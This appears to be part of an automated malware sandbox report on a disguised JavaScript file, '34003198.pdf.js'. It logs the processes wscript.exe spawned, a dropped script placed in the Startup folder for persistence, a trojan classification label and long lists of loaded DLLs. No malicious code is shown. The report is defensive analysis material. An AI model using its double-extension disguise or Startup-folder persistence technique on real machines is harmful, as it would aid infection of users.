Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"	Jump to behavior

Java / VBScript file with very long strings (likely obfuscated code)

Source: 34003198.pdf.js

Initial sample: Strings found which are bigger than 50

Source: classification engine

Classification label: mal100.troj.expl.evad.winJS@17/6@1/2

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\bCdHGOcGLp.js

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\34003198.pdf.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
